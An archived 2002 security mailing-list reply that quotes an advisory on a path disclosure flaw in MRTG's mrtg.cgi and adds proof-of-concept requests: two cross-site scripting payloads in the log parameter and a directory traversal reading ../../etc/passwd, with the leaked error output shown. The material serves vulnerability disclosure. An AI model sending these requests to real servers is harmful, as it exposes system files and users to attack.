Re: Mrtg Path Disclosure Vulnerability

["Frog Man" <leseulfrog () hotmail com>]

/mrtg.cgi?log=<script>alert('CSS')</script>

/mrtg.cgi?log=<script>alert('Cross Site Scripting')</script>

/mrtg.cgi?cfg=../../etc/passwd :

------------------- mrtg.cgi error ------------------------

Software error:
ERROR: CFG Error Unknown Option "root:PASS:0:0:root:/root" on line 2 or 
above. Check doc/reference.txt for Help

------------------- mrtg.cgi error ------------------------


> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Mrtg Path Disclosure Vulnerability
>
> Type:
> Input Validation Error
>
> Release Date:
> February 4, 2002
>
> Product / Vendor:
> The Multi Router Traffic Grapher (Mrtg) is a tool to monitor the
> traffic load on network-links. Mrtg generates html pages containing
> gif images which provide a live visual representation of this
> traffic.
>
> http://www.mrtg.org
>
> Summary:
> If an attacker submits a web request containing unexpected arguments
> for script variables, an error message will be displayed containing
> the path to the webroot directory of the server running the Mrtg cgi
> script.
>
> http://host/mrtg.cgi?cfg=blabla
>
> Tested:
> Mrtg v2.090011
> Mrtg v2.090006
>
> Vulnerable:
> Mrtg v2.090011
> Mrtg v2.090006
>
> And may be other.
>
> Disclaimer:
> http://www.securityoffice.net is not responsible for the misuse or
> illegal use of any of the information and/or the software listed on
> this security advisory.
>
> Author:
> Tamer Sahin
> ts () securityoffice net
> http://www.securityoffice.net
>
> Tamer Sahin
> http://www.securityoffice.net
> PGP Key ID: 0x2B5EDCB0 Fingerprint:
> B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP 7.1
>
> iQA/AwUBPF3TbLuLpFMrXtywEQIU5QCghYmngYvhwveU+8W3JwTz5QtsmU0AoJZD
> Tbl6HDhKVnFPEy1DSB3/q3AH
> =+kUc
> -----END PGP SIGNATURE-----




_________________________________________________________________
Téléchargez MSN Explorer gratuitement à l'adresse 
http://explorer.msn.fr/intl.asp.